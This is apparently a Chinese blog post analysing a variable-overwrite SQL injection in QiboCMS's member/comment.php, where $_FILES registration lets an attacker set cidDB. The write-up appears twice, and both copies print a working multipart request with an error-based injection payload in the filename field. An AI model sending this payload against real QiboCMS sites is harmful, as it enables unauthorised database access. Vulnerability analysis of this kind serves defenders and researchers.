齐博CMS变量覆盖导致sql注入漏洞分析
2015-03-11 17:20
991 查看
齐博CMS变量覆盖导致sql注入漏洞分析
漏洞具体详情见http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13。
1. 根据阿里文章会员中心评论管理member/comment.php中存在变量cidDB未初始化,所以从此处开始利用对评论批量删除,抓包查看
2.exp利用全局变量$_FILES的注册变量控制不严,所以需要在request请求中增加一段文件上传代码,代码如下:
Content-Type: multipart/form-data;boundary=---------------------------159592790718612
Content-Length: 296
-----------------------------159592790718612
Content-Disposition: form-data; name="file";filename="123.txt"
Content-Type: text/plain
test
-----------------------------159592790718612
Content-Disposition: form-data;name="submit"
submit
-----------------------------159592790718612—
当利用common.inc.php处理request时,将会注册$_FILES的变量。覆盖变量cidDB,
当$cidDB被遍历查询是,$value就是filename的值,即注入playload。
从上面可以看到查询结果并不回显,用报错注入或盲注。
最终playload为Connection: keep-alive
Content-Type: multipart/form-data;boundary=---------------------------298212969230504
Content-Length: 392
-----------------------------298212969230504
Content-Disposition: form-data;name="cidDB"; filename="7' and (select 1 from(selectcount(*),concat((select (select (select concat(0x7e,version(),0x7e))) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a)#"
Content-Type: text/plain
test
-----------------------------298212969230504—
漏洞具体详情见http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13。
1. 根据阿里文章会员中心评论管理member/comment.php中存在变量cidDB未初始化,所以从此处开始利用对评论批量删除,抓包查看
2.exp利用全局变量$_FILES的注册变量控制不严,所以需要在request请求中增加一段文件上传代码,代码如下:
Content-Type: multipart/form-data;boundary=---------------------------159592790718612
Content-Length: 296
-----------------------------159592790718612
Content-Disposition: form-data; name="file";filename="123.txt"
Content-Type: text/plain
test
-----------------------------159592790718612
Content-Disposition: form-data;name="submit"
submit
-----------------------------159592790718612—
当利用common.inc.php处理request时,将会注册$_FILES的变量。覆盖变量cidDB,
当$cidDB被遍历查询是,$value就是filename的值,即注入playload。
从上面可以看到查询结果并不回显,用报错注入或盲注。
最终playload为Connection: keep-alive
Content-Type: multipart/form-data;boundary=---------------------------298212969230504
Content-Length: 392
-----------------------------298212969230504
Content-Disposition: form-data;name="cidDB"; filename="7' and (select 1 from(selectcount(*),concat((select (select (select concat(0x7e,version(),0x7e))) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a)#"
Content-Type: text/plain
test
-----------------------------298212969230504—
相关文章推荐
- dedecms SESSION变量覆盖导致SQL注入漏洞修补方案
- phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞
- dede源码详细分析之--全局变量覆盖漏洞的防御
- dede源码详细分析之--全局变量覆盖漏洞的防御
- dedecms SESSION变量覆盖导致SQL注入common.inc.php的解决
- dede源码详细分析之--全局变量覆盖漏洞的防御
- 织梦(DEDE)CMS V5.3 覆盖任意变量导致远程包含漏洞
- 关于DLL工程中存在全局变量可能导致MFC内存泄露误报的原因分析及解决办法
- ThinkPHP 3.1中的SQL注入漏洞分析----论ThinkPHP 3.1中的半吊子的PDO封装
- 关于DLL工程中存在全局变量可能导致MFC内存泄露误报的原因分析及解决办法
- SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法
- DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
- linux下So覆盖导致coredump问题的分析
- 易想(easethink)团购系统ajax文件导致SQL注入漏洞
- DEDECMS全局变量覆盖漏洞科普
- 微软漏洞导致SQL注入威胁
- ThinkPHP 3.1中的SQL注入漏洞分析----论ThinkPHP 3.1中的半吊子的PDO封装
- SQL注入漏洞及绑定变量浅谈
- Ucenter Home SQL注入漏洞详细分析(需要GPC=OFF)
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp